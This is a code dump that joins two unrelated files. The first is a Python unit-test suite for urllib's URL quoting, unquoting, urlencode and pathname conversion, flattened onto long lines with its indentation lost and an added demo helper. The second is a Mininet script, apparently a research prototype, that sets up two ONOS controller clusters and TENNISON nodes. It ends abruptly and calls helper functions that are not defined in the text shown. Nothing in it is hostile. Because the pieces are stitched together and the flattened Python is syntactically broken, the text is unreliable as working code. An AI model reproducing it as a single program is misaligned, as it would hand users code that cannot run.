The various character sets specified are: Reserved characters : ";/?:@&=+$," Have special meaning in URIs and must be escaped if not being used for their special meaning Data characters : letters, digits, and "-_.!~*'()" Unreserved and do not need to be escaped; can be, though, if desired Control characters : 0x00 - 0x1F, 0x7F Have no use in URIs so must be escaped space : 0x20 Must be escaped Delimiters : '<>#%"' Must be escaped Unwise : "{}|\^[]`" Must be escaped """ def test_never_quote(self): # Make sure quote() does not quote letters, digits, and "_,.-" do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ", "abcdefghijklmnopqrstuvwxyz", "0123456789", "_.-~"]) result = urllib.parse.quote(do_not_quote) self.assertEqual(do_not_quote, result, "using quote(): %r != %r" % (do_not_quote, result)) result = urllib.parse.quote_plus(do_not_quote) self.assertEqual(do_not_quote, result, "using quote_plus(): %r != %r" % (do_not_quote, result)) def test_default_safe(self): # Test '/' is default value for 'safe' parameter self.assertEqual(urllib.parse.quote.__defaults__[0], '/') def test_safe(self): # Test setting 'safe' parameter does what it should do quote_by_default = "<>" result = urllib.parse.quote(quote_by_default, safe=quote_by_default) self.assertEqual(quote_by_default, result, "using quote(): %r != %r" % (quote_by_default, result)) result = urllib.parse.quote_plus(quote_by_default, safe=quote_by_default) self.assertEqual(quote_by_default, result, "using quote_plus(): %r != %r" % (quote_by_default, result)) # Safe expressed as bytes rather than str result = urllib.parse.quote(quote_by_default, safe=b"<>") self.assertEqual(quote_by_default, result, "using quote(): %r != %r" % (quote_by_default, result)) # "Safe" non-ASCII characters should have no effect # (Since URIs are not allowed to have non-ASCII characters) result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="\xfc") expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="") self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) # Same as above, but using a bytes rather than str result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe=b"\xfc") expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="") self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) def test_default_quoting(self): # Make sure all characters that should be quoted are by default sans # space (separate test for that). 
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F should_quote.append(r'<>#%"{}|\^[]`') should_quote.append(chr(127)) # For 0x7F should_quote = ''.join(should_quote) for char in should_quote: result = urllib.parse.quote(char) self.assertEqual(hexescape(char), result, "using quote(): " "%s should be escaped to %s, not %s" % (char, hexescape(char), result)) result = urllib.parse.quote_plus(char) self.assertEqual(hexescape(char), result, "using quote_plus(): " "%s should be escapes to %s, not %s" % (char, hexescape(char), result)) del should_quote partial_quote = "ab[]cd" expected = "ab%5B%5Dcd" result = urllib.parse.quote(partial_quote) self.assertEqual(expected, result, "using quote(): %r != %r" % (expected, result)) result = urllib.parse.quote_plus(partial_quote) self.assertEqual(expected, result, "using quote_plus(): %r != %r" % (expected, result)) def test_quoting_space(self): # Make sure quote() and quote_plus() handle spaces as specified in # their unique way result = urllib.parse.quote(' ') self.assertEqual(result, hexescape(' '), "using quote(): %r != %r" % (result, hexescape(' '))) result = urllib.parse.quote_plus(' ') self.assertEqual(result, '+', "using quote_plus(): %r != +" % result) given = "a b cd e f" expect = given.replace(' ', hexescape(' ')) result = urllib.parse.quote(given) self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) expect = given.replace(' ', '+') result = urllib.parse.quote_plus(given) self.assertEqual(expect, result, "using quote_plus(): %r != %r" % (expect, result)) def test_quoting_plus(self): self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma'), 'alpha%2Bbeta+gamma') self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', '+'), 'alpha+beta+gamma') # Test with bytes self.assertEqual(urllib.parse.quote_plus(b'alpha+beta gamma'), 'alpha%2Bbeta+gamma') # Test with safe bytes self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', b'+'), 'alpha+beta+gamma') def test_quote_bytes(self): # Bytes should quote directly to percent-encoded values given = b"\xa2\xd8ab\xff" expect = "%A2%D8ab%FF" result = urllib.parse.quote(given) self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) # Encoding argument should raise type error on bytes input self.assertRaises(TypeError, urllib.parse.quote, given, encoding="latin-1") # quote_from_bytes should work the same result = urllib.parse.quote_from_bytes(given) self.assertEqual(expect, result, "using quote_from_bytes(): %r != %r" % (expect, result)) def test_quote_with_unicode(self): # Characters in Latin-1 range, encoded by default in UTF-8 given = "\xa2\xd8ab\xff" expect = "%C2%A2%C3%98ab%C3%BF" result = urllib.parse.quote(given) self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) # Characters in Latin-1 range, encoded by with None (default) result = urllib.parse.quote(given, encoding=None, errors=None) self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) # Characters in Latin-1 range, encoded with Latin-1 given = "\xa2\xd8ab\xff" expect = "%A2%D8ab%FF" result = urllib.parse.quote(given, encoding="latin-1") self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) # Characters in BMP, encoded by default in UTF-8 given = "\u6f22\u5b57" # "Kanji" expect = "%E6%BC%A2%E5%AD%97" result = urllib.parse.quote(given) self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) # Characters in BMP, encoded with Latin-1 given = "\u6f22\u5b57" 
self.assertRaises(UnicodeEncodeError, urllib.parse.quote, given, encoding="latin-1") # Characters in BMP, encoded with Latin-1, with replace error handling given = "\u6f22\u5b57" expect = "%3F%3F" # "??" result = urllib.parse.quote(given, encoding="latin-1", errors="replace") self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) # Characters in BMP, Latin-1, with xmlcharref error handling given = "\u6f22\u5b57" expect = "%26%2328450%3B%26%2323383%3B" # "&#28450;&#23383;" result = urllib.parse.quote(given, encoding="latin-1", errors="xmlcharrefreplace") self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) def test_quote_plus_with_unicode(self): # Encoding (latin-1) test for quote_plus given = "\xa2\xd8 \xff" expect = "%A2%D8+%FF" result = urllib.parse.quote_plus(given, encoding="latin-1") self.assertEqual(expect, result, "using quote_plus(): %r != %r" % (expect, result)) # Errors test for quote_plus given = "ab\u6f22\u5b57 cd" expect = "ab%3F%3F+cd" result = urllib.parse.quote_plus(given, encoding="latin-1", errors="replace") self.assertEqual(expect, result, "using quote_plus(): %r != %r" % (expect, result)) class UnquotingTests(unittest.TestCase): """Tests for unquote() and unquote_plus() See the doc string for quoting_Tests for details on quoting and such. """ def test_unquoting(self): # Make sure unquoting of all ASCII values works escape_list = [] for num in range(128): given = hexescape(chr(num)) expect = chr(num) result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) result = urllib.parse.unquote_plus(given) self.assertEqual(expect, result, "using unquote_plus(): %r != %r" % (expect, result)) escape_list.append(given) escape_string = ''.join(escape_list) del escape_list result = urllib.parse.unquote(escape_string) self.assertEqual(result.count('%'), 1, "using unquote(): not all characters escaped: " "%s" % result) self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, None) self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, ()) with support.check_warnings(('', BytesWarning), quiet=True): self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, b'') def test_unquoting_badpercent(self): # Test unquoting on bad percent-escapes given = '%xab' expect = given result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) given = '%x' expect = given result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) given = '%' expect = given result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) # unquote_to_bytes given = '%xab' expect = bytes(given, 'ascii') result = urllib.parse.unquote_to_bytes(given) self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r" % (expect, result)) given = '%x' expect = bytes(given, 'ascii') result = urllib.parse.unquote_to_bytes(given) self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r" % (expect, result)) given = '%' expect = bytes(given, 'ascii') result = urllib.parse.unquote_to_bytes(given) self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r" % (expect, result)) self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, None) self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, ()) def test_unquoting_mixed_case(self): # Test unquoting on 
mixed-case hex digits in the percent-escapes given = '%Ab%eA' expect = b'\xab\xea' result = urllib.parse.unquote_to_bytes(given) self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r" % (expect, result)) def test_unquoting_parts(self): # Make sure unquoting works when have non-quoted characters # interspersed given = 'ab%sd' % hexescape('c') expect = "abcd" result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) result = urllib.parse.unquote_plus(given) self.assertEqual(expect, result, "using unquote_plus(): %r != %r" % (expect, result)) def test_unquoting_plus(self): # Test difference between unquote() and unquote_plus() given = "are+there+spaces..." expect = given result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) expect = given.replace('+', ' ') result = urllib.parse.unquote_plus(given) self.assertEqual(expect, result, "using unquote_plus(): %r != %r" % (expect, result)) def test_unquote_to_bytes(self): given = 'br%C3%BCckner_sapporo_20050930.doc' expect = b'br\xc3\xbcckner_sapporo_20050930.doc' result = urllib.parse.unquote_to_bytes(given) self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r" % (expect, result)) # Test on a string with unescaped non-ASCII characters # (Technically an invalid URI; expect those characters to be UTF-8 # encoded). result = urllib.parse.unquote_to_bytes("\u6f22%C3%BC") expect = b'\xe6\xbc\xa2\xc3\xbc' # UTF-8 for "\u6f22\u00fc" self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r" % (expect, result)) # Test with a bytes as input given = b'%A2%D8ab%FF' expect = b'\xa2\xd8ab\xff' result = urllib.parse.unquote_to_bytes(given) self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r" % (expect, result)) # Test with a bytes as input, with unescaped non-ASCII bytes # (Technically an invalid URI; expect those bytes to be preserved) given = b'%A2\xd8ab%FF' expect = b'\xa2\xd8ab\xff' result = urllib.parse.unquote_to_bytes(given) self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r" % (expect, result)) def test_unquote_with_unicode(self): # Characters in the Latin-1 range, encoded with UTF-8 given = 'br%C3%BCckner_sapporo_20050930.doc' expect = 'br\u00fcckner_sapporo_20050930.doc' result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) # Characters in the Latin-1 range, encoded with None (default) result = urllib.parse.unquote(given, encoding=None, errors=None) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) # Characters in the Latin-1 range, encoded with Latin-1 result = urllib.parse.unquote('br%FCckner_sapporo_20050930.doc', encoding="latin-1") expect = 'br\u00fcckner_sapporo_20050930.doc' self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) # Characters in BMP, encoded with UTF-8 given = "%E6%BC%A2%E5%AD%97" expect = "\u6f22\u5b57" # "Kanji" result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) # Decode with UTF-8, invalid sequence given = "%F3%B1" expect = "\ufffd" # Replacement character result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) # Decode with UTF-8, invalid sequence, replace errors result = urllib.parse.unquote(given, errors="replace") self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, 
result)) # Decode with UTF-8, invalid sequence, ignoring errors given = "%F3%B1" expect = "" result = urllib.parse.unquote(given, errors="ignore") self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) # A mix of non-ASCII and percent-encoded characters, UTF-8 result = urllib.parse.unquote("\u6f22%C3%BC") expect = '\u6f22\u00fc' self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) # A mix of non-ASCII and percent-encoded characters, Latin-1 # (Note, the string contains non-Latin-1-representable characters) result = urllib.parse.unquote("\u6f22%FC", encoding="latin-1") expect = '\u6f22\u00fc' self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) class urlencode_Tests(unittest.TestCase): """Tests for urlencode()""" def help_inputtype(self, given, test_type): """Helper method for testing different input types. 'given' must lead to only the pairs: * 1st, 1 * 2nd, 2 * 3rd, 3 Test cannot assume anything about order. Docs make no guarantee and have possible dictionary input. """ expect_somewhere = ["1st=1", "2nd=2", "3rd=3"] result = urllib.parse.urlencode(given) for expected in expect_somewhere: self.assertIn(expected, result, "testing %s: %s not found in %s" % (test_type, expected, result)) self.assertEqual(result.count('&'), 2, "testing %s: expected 2 '&'s; got %s" % (test_type, result.count('&'))) amp_location = result.index('&') on_amp_left = result[amp_location - 1] on_amp_right = result[amp_location + 1] self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(), "testing %s: '&' not located in proper place in %s" % (test_type, result)) self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps "testing %s: " "unexpected number of characters: %s != %s" % (test_type, len(result), (5 * 3) + 2)) def test_using_mapping(self): # Test passing in a mapping object as an argument. self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'}, "using dict as input type") def test_using_sequence(self): # Test passing in a sequence of two-item sequences as an argument. 
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')], "using sequence of two-item tuples as input") def test_quoting(self): # Make sure keys and values are quoted using quote_plus() given = {"&":"="} expect = "%s=%s" % (hexescape('&'), hexescape('=')) result = urllib.parse.urlencode(given) self.assertEqual(expect, result) given = {"key name":"A bunch of pluses"} expect = "key+name=A+bunch+of+pluses" result = urllib.parse.urlencode(given) self.assertEqual(expect, result) def test_doseq(self): # Test that passing True for 'doseq' parameter works correctly given = {'sequence':['1', '2', '3']} expect = "sequence=%s" % urllib.parse.quote_plus(str(['1', '2', '3'])) result = urllib.parse.urlencode(given) self.assertEqual(expect, result) result = urllib.parse.urlencode(given, True) for value in given["sequence"]: expect = "sequence=%s" % value self.assertIn(expect, result) self.assertEqual(result.count('&'), 2, "Expected 2 '&'s, got %s" % result.count('&')) def test_empty_sequence(self): self.assertEqual("", urllib.parse.urlencode({})) self.assertEqual("", urllib.parse.urlencode([])) def test_nonstring_values(self): self.assertEqual("a=1", urllib.parse.urlencode({"a": 1})) self.assertEqual("a=None", urllib.parse.urlencode({"a": None})) def test_nonstring_seq_values(self): self.assertEqual("a=1&a=2", urllib.parse.urlencode({"a": [1, 2]}, True)) self.assertEqual("a=None&a=a", urllib.parse.urlencode({"a": [None, "a"]}, True)) data = collections.OrderedDict([("a", 1), ("b", 1)]) self.assertEqual("a=a&a=b", urllib.parse.urlencode({"a": data}, True)) def test_urlencode_encoding(self): # ASCII encoding. Expect %3F with errors="replace' given = (('\u00a0', '\u00c1'),) expect = '%3F=%3F' result = urllib.parse.urlencode(given, encoding="ASCII", errors="replace") self.assertEqual(expect, result) # Default is UTF-8 encoding. given = (('\u00a0', '\u00c1'),) expect = '%C2%A0=%C3%81' result = urllib.parse.urlencode(given) self.assertEqual(expect, result) # Latin-1 encoding. given = (('\u00a0', '\u00c1'),) expect = '%A0=%C1' result = urllib.parse.urlencode(given, encoding="latin-1") self.assertEqual(expect, result) def test_urlencode_encoding_doseq(self): # ASCII Encoding. Expect %3F with errors="replace' given = (('\u00a0', '\u00c1'),) expect = '%3F=%3F' result = urllib.parse.urlencode(given, doseq=True, encoding="ASCII", errors="replace") self.assertEqual(expect, result) # ASCII Encoding. On a sequence of values. 
given = (("\u00a0", (1, "\u00c1")),) expect = '%3F=1&%3F=%3F' result = urllib.parse.urlencode(given, True, encoding="ASCII", errors="replace") self.assertEqual(expect, result) # Utf-8 given = (("\u00a0", "\u00c1"),) expect = '%C2%A0=%C3%81' result = urllib.parse.urlencode(given, True) self.assertEqual(expect, result) given = (("\u00a0", (42, "\u00c1")),) expect = '%C2%A0=42&%C2%A0=%C3%81' result = urllib.parse.urlencode(given, True) self.assertEqual(expect, result) # latin-1 given = (("\u00a0", "\u00c1"),) expect = '%A0=%C1' result = urllib.parse.urlencode(given, True, encoding="latin-1") self.assertEqual(expect, result) given = (("\u00a0", (42, "\u00c1")),) expect = '%A0=42&%A0=%C1' result = urllib.parse.urlencode(given, True, encoding="latin-1") self.assertEqual(expect, result) def test_urlencode_bytes(self): given = ((b'\xa0\x24', b'\xc1\x24'),) expect = '%A0%24=%C1%24' result = urllib.parse.urlencode(given) self.assertEqual(expect, result) result = urllib.parse.urlencode(given, True) self.assertEqual(expect, result) # Sequence of values given = ((b'\xa0\x24', (42, b'\xc1\x24')),) expect = '%A0%24=42&%A0%24=%C1%24' result = urllib.parse.urlencode(given, True) self.assertEqual(expect, result) def test_urlencode_encoding_safe_parameter(self): # Send '$' (\x24) as safe character # Default utf-8 encoding given = ((b'\xa0\x24', b'\xc1\x24'),) result = urllib.parse.urlencode(given, safe=":$") expect = '%A0$=%C1$' self.assertEqual(expect, result) given = ((b'\xa0\x24', b'\xc1\x24'),) result = urllib.parse.urlencode(given, doseq=True, safe=":$") expect = '%A0$=%C1$' self.assertEqual(expect, result) # Safe parameter in sequence given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),) expect = '%A0$=%C1$&%A0$=13&%A0$=42' result = urllib.parse.urlencode(given, True, safe=":$") self.assertEqual(expect, result) # Test all above in latin-1 encoding given = ((b'\xa0\x24', b'\xc1\x24'),) result = urllib.parse.urlencode(given, safe=":$", encoding="latin-1") expect = '%A0$=%C1$' self.assertEqual(expect, result) given = ((b'\xa0\x24', b'\xc1\x24'),) expect = '%A0$=%C1$' result = urllib.parse.urlencode(given, doseq=True, safe=":$", encoding="latin-1") given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),) expect = '%A0$=%C1$&%A0$=13&%A0$=42' result = urllib.parse.urlencode(given, True, safe=":$", encoding="latin-1") self.assertEqual(expect, result) class Pathname_Tests(unittest.TestCase): """Test pathname2url() and url2pathname()""" def test_basic(self): # Make sure simple tests pass expected_path = os.path.join("parts", "of", "a", "path") expected_url = "parts/of/a/path" result = urllib.request.pathname2url(expected_path) self.assertEqual(expected_url, result, "pathname2url() failed; %s != %s" % (result, expected_url)) result = urllib.request.url2pathname(expected_url) self.assertEqual(expected_path, result, "url2pathame() failed; %s != %s" % (result, expected_path)) def test_quoting(self): # Test automatic quoting and unquoting works for pathnam2url() and # url2pathname() respectively given = os.path.join("needs", "quot=ing", "here") expect = "needs/%s/here" % urllib.parse.quote("quot=ing") result = urllib.request.pathname2url(given) self.assertEqual(expect, result, "pathname2url() failed; %s != %s" % (expect, result)) expect = given result = urllib.request.url2pathname(result) self.assertEqual(expect, result, "url2pathname() failed; %s != %s" % (expect, result)) given = os.path.join("make sure", "using_quote") expect = "%s/using_quote" % urllib.parse.quote("make sure") result = urllib.request.pathname2url(given) 
self.assertEqual(expect, result, "pathname2url() failed; %s != %s" % (expect, result)) given = "make+sure/using_unquote" expect = os.path.join("make+sure", "using_unquote") result = urllib.request.url2pathname(given) self.assertEqual(expect, result, "url2pathname() failed; %s != %s" % (expect, result)) @unittest.skipUnless(sys.platform == 'win32', 'test specific to the urllib.url2path function.') def test_ntpath(self): given = ('/C:/', '///C:/', '/C|//') expect = 'C:\\' for url in given: result = urllib.request.url2pathname(url) self.assertEqual(expect, result, 'urllib.request..url2pathname() failed; %s != %s' % (expect, result)) given = '///C|/path' expect = 'C:\\path' result = urllib.request.url2pathname(given) self.assertEqual(expect, result, 'urllib.request.url2pathname() failed; %s != %s' % (expect, result)) class Utility_Tests(unittest.TestCase): """Testcase to test the various utility functions in the urllib.""" def test_thishost(self): """Test the urllib.request.thishost utility function returns a tuple""" self.assertIsInstance(urllib.request.thishost(), tuple) class URLopener_Tests(unittest.TestCase): """Testcase to test the open method of URLopener class.""" def test_quoted_open(self): class DummyURLopener(urllib.request.URLopener): def open_spam(self, url): return url with support.check_warnings( ('DummyURLopener style of invoking requests is deprecated.', DeprecationWarning)): self.assertEqual(DummyURLopener().open( 'spam://example/ /'),'//example/%20/') # test the safe characters are not quoted by urlopen self.assertEqual(DummyURLopener().open( "spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"), "//c:|windows%/:=&?~#+!$,;'@()*[]|/path/") # Just commented them out. # Can't really tell why keep failing in windows and sparc. # Everywhere else they work ok, but on those machines, sometimes # fail in one of the tests, sometimes in other. I have a linux, and # the tests go ok. # If anybody has one of the problematic environments, please help! # . 
Facundo # # def server(evt): # import socket, time # serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # serv.settimeout(3) # serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # serv.bind(("", 9093)) # serv.listen() # try: # conn, addr = serv.accept() # conn.send("1 Hola mundo\n") # cantdata = 0 # while cantdata < 13: # data = conn.recv(13-cantdata) # cantdata += len(data) # time.sleep(.3) # conn.send("2 No more lines\n") # conn.close() # except socket.timeout: # pass # finally: # serv.close() # evt.set() # # class FTPWrapperTests(unittest.TestCase): # # def setUp(self): # import ftplib, time, threading # ftplib.FTP.port = 9093 # self.evt = threading.Event() # threading.Thread(target=server, args=(self.evt,)).start() # time.sleep(.1) # # def tearDown(self): # self.evt.wait() # # def testBasic(self): # # connects # ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, []) # ftp.close() # # def testTimeoutNone(self): # # global default timeout is ignored # import socket # self.assertIsNone(socket.getdefaulttimeout()) # socket.setdefaulttimeout(30) # try: # ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, []) # finally: # socket.setdefaulttimeout(None) # self.assertEqual(ftp.ftp.sock.gettimeout(), 30) # ftp.close() # # def testTimeoutDefault(self): # # global default timeout is used # import socket # self.assertIsNone(socket.getdefaulttimeout()) # socket.setdefaulttimeout(30) # try: # ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, []) # finally: # socket.setdefaulttimeout(None) # self.assertEqual(ftp.ftp.sock.gettimeout(), 30) # ftp.close() # # def testTimeoutValue(self): # ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [], # timeout=30) # self.assertEqual(ftp.ftp.sock.gettimeout(), 30) # ftp.close() class RequestTests(unittest.TestCase): """Unit tests for urllib.request.Request.""" def test_default_values(self): Request = urllib.request.Request request = Request("http://www.python.org") self.assertEqual(request.get_method(), 'GET') request = Request("http://www.python.org", {}) self.assertEqual(request.get_method(), 'POST') def test_with_method_arg(self): Request = urllib.request.Request request = Request("http://www.python.org", method='HEAD') self.assertEqual(request.method, 'HEAD') self.assertEqual(request.get_method(), 'HEAD') request = Request("http://www.python.org", {}, method='HEAD') self.assertEqual(request.method, 'HEAD') self.assertEqual(request.get_method(), 'HEAD') request = Request("http://www.python.org", method='GET') self.assertEqual(request.get_method(), 'GET') request.method = 'HEAD' self.assertEqual(request.get_method(), 'HEAD') class URL2PathNameTests(unittest.TestCase): def test_converting_drive_letter(self): self.assertEqual(url2pathname("///C|"), 'C:') self.assertEqual(url2pathname("///C:"), 'C:') self.assertEqual(url2pathname("///C|/"), 'C:\\') def test_converting_when_no_drive_letter(self): # cannot end a raw string in \ self.assertEqual(url2pathname("///C/test/"), r'\\\C\test' '\\') self.assertEqual(url2pathname("////C/test/"), r'\\C\test' '\\') def test_simple_compare(self): self.assertEqual(url2pathname("///C|/foo/bar/spam.foo"), r'C:\foo\bar\spam.foo') def test_non_ascii_drive_letter(self): self.assertRaises(IOError, url2pathname, "///\u00e8|/") def test_roundtrip_url2pathname(self): list_of_paths = ['C:', r'\\\C\test\\', r'C:\foo\bar\spam.foo' ] for path in list_of_paths: self.assertEqual(url2pathname(pathname2url(path)), path) class PathName2URLTests(unittest.TestCase): def 
test_converting_drive_letter(self): self.assertEqual(pathname2url("C:"), '///C:') self.assertEqual(pathname2url("C:\\"), '///C:') def test_converting_when_no_drive_letter(self): self.assertEqual(pathname2url(r"\\\folder\test" "\\"), '/////folder/test/') self.assertEqual(pathname2url(r"\\folder\test" "\\"), '////folder/test/') self.assertEqual(pathname2url(r"\folder\test" "\\"), '/folder/test/') def test_simple_compare(self): self.assertEqual(pathname2url(r'C:\foo\bar\spam.foo'), "///C:/foo/bar/spam.foo" ) def test_long_drive_letter(self): self.assertRaises(IOError, pathname2url, "XX:\\") def test_roundtrip_pathname2url(self): list_of_paths = ['///C:', '/////folder/test/', '///C:/foo/bar/spam.foo'] for path in list_of_paths: self.assertEqual(pathname2url(url2pathname(path)), path) if __name__ == '__main__': unittest.main()
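# --- Hedged illustration (editorial addition, not part of the test file) ----
# The QuotingTests docstring above describes the RFC 3986 rule: characters
# outside the unreserved set are escaped as '%' plus a two-digit hex value.
# This minimal sketch checks that rule against urllib.parse.quote() for a few
# reserved/delimiter characters; the helper name below is hypothetical.
def _percent_escape_demo():
    import urllib.parse
    def percent_escape(ch):
        # e.g. ' ' -> '%20', '<' -> '%3C', '#' -> '%23'
        return '%{:02X}'.format(ord(ch))
    checked = {}
    for ch in ' <>#"':
        assert urllib.parse.quote(ch, safe='') == percent_escape(ch)
        checked[ch] = percent_escape(ch)
    return checked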
multicluster.py
#!/usr/bin/python """ multicluster.py: multiple ONOS clusters example We create two ONOSClusters, "east" and "west", and a LinearTopo data network where the first and second halves of the network are connected to each ONOSCluster, respectively. The size of the ONOSCluster is determined by its topology. In this example the topology is a SingleSwitchTopo of size 1, so the "Cluster" is actually a single node (for performance and resource usage reasons.) However, it is possible to use larger cluster sizes in a large (!) Mininet VM, (e.g. 12 GB of RAM for two 3-node ONOS clusters.) The MultiSwitch class is a customized version of ONOSOVSSwitch that has a "controller" instance variable (and parameter) """ from mininet.net import Mininet from mininet.topo import LinearTopo, SingleSwitchTopo from mininet.log import setLogLevel from mininet.topolib import TreeTopo, TorusTopo from mininet.clean import cleanup from mininet.util import quietRun, specialClass from mininet.log import setLogLevel, info, warn, error, debug from onos import ONOSCluster, ONOSOVSSwitch, ONOSCLI, RenamedTopo from tennison import TENNISONNode import logging import threading import time import sys from colorama import init init(strip=not sys.stdout.isatty()) # strip colors if stdout is redirected from termcolor import cprint from pyfiglet import figlet_format class MultiSwitch( ONOSOVSSwitch ): "Custom OVSSwitch() subclass that connects to different clusters" def __init__( self, *args, **kwargs ): "controller: controller/ONOSCluster to connect to" self.controller = kwargs.pop( 'controller', None ) ONOSOVSSwitch.__init__( self, *args, **kwargs ) def start( self, controllers ): "Start and connect to our previously specified controller" return ONOSOVSSwitch.start( self, [ self.controller ] ) def run(): "Test a multiple ONOS cluster network" #setLogLevel( 'error' ) cprint(figlet_format('TENNISON', font='slant'), 'red') setLogLevel( 'info' ) loading_bar_thread = threading.Thread(name='loading_bar', target=loading_bar) #loading_bar_thread.start() #progress(10, 100, status='Processing topology') # East and west control network topologies (using RenamedTopo) # We specify switch and host prefixes to avoid name collisions # East control switch prefix: 'east_cs', ONOS node prefix: 'east_onos' # Each network is a renamed SingleSwitchTopo of size clusterSize # It's also possible to specify your own control network topology clusterSize = 1 update_loading_bar(5, 'Transforiming cluster toplogies') etopo = RenamedTopo( SingleSwitchTopo, clusterSize, snew='a_cs', hnew='alpha_c' ) wtopo = RenamedTopo( SingleSwitchTopo, clusterSize, snew='b_cs', hnew='beta_c' ) # east and west ONOS clusters # Note that we specify the NAT node names to avoid name collisions #progress(20, 100, status='Launching ONOS cluster alpha') update_loading_bar(10, 'Creating alpha cluster') alpha_cluster = ONOSCluster( 'alpha', topo=etopo, ipBase='192.168.123.0/24', nat='alpha_nat' ) update_loading_bar(10, 'Creating beta cluster') #progress(50, 100, status='Launching ONOS cluster beta') beta_cluster = ONOSCluster( 'beta', topo=wtopo, ipBase='192.168.124.0/24', nat='beta_nat', portOffset=100 ) # Data network topology. TODO Add link delays and change topo. 
#progress(70, 100, status='Initialising topology') update_loading_bar(10, 'Creating topology') topo = LinearTopo( 10 ) #topo = TreeTopo(2) #progress(80, 100, status='Creating network') # Create network update_loading_bar(5, 'Compiling topologies') net = Mininet( topo=topo, switch=MultiSwitch, controller=[ alpha_cluster, beta_cluster ] ) #progress(85, 100, status='Launching TENNISON instance alpha') update_loading_bar(5, 'Adding tennison alpha') tennison_alpha = net.addHost('alpha_t', cls=TENNISONNode, ipBase='192.168.123.1/24', ip='192.168.123.100', gw='192.168.123.2') net.addLink(tennison_alpha, alpha_cluster.net.get('a_cs1')) #progress(90, 100, status='Launching TENNISON instance beta') update_loading_bar(5, 'Adding tennison beta') tennison_beta = net.addHost('beta_t', cls=TENNISONNode, portOffset=100, ipBase='192.168.124.1/24', ip='192.168.124.100', gw='192.168.124.2') net.addLink(tennison_beta, beta_cluster.net.get('b_cs1')) # Assign switches to controllers count = len( net.switches ) #TODO this will have to change depending on the topology for i, switch in enumerate( net.switches ): #progress(90+i, 100, status='Connecting switches to ONOS') switch.controller = alpha_cluster if i < count/2 else beta_cluster #TODO Need to add TENNISON here. Connect TENNISON to controller switches #TENNISON is a mininet Node with a direct connect to ONOS (preferably not over loopback) # Start up network #progress(99, 100, status='Loading network, please wait') update_loading_bar(5, 'Launching network, please wait') net.start() #tennison_alpha.setIP('192.168.123.2') #progress(100, 100, status='Complete') # This code should be placed in the Tennison class update_loading_bar(5, 'Starting tennison alpha') output = tennison_alpha.cmd('ifconfig alpha_t-eth0 192.168.123.100') output = tennison_alpha.cmd('route add default gw 192.168.123.2') output = tennison_alpha.cmd('ifconfig lo up') #info('Setting tennison alpha ip ' + output) tennison_alpha.start() update_loading_bar(5, 'Starting tennison beta') output = tennison_beta.cmd('ifconfig beta_t-eth0 192.168.124.100') output = tennison_beta.cmd('route add default gw 192.168.124.2') output = tennison_beta.cmd('ifconfig lo up') ##info('Setting tennison beta ip ' + output) tennison_beta.start() fixIPTables() #Install onos apps 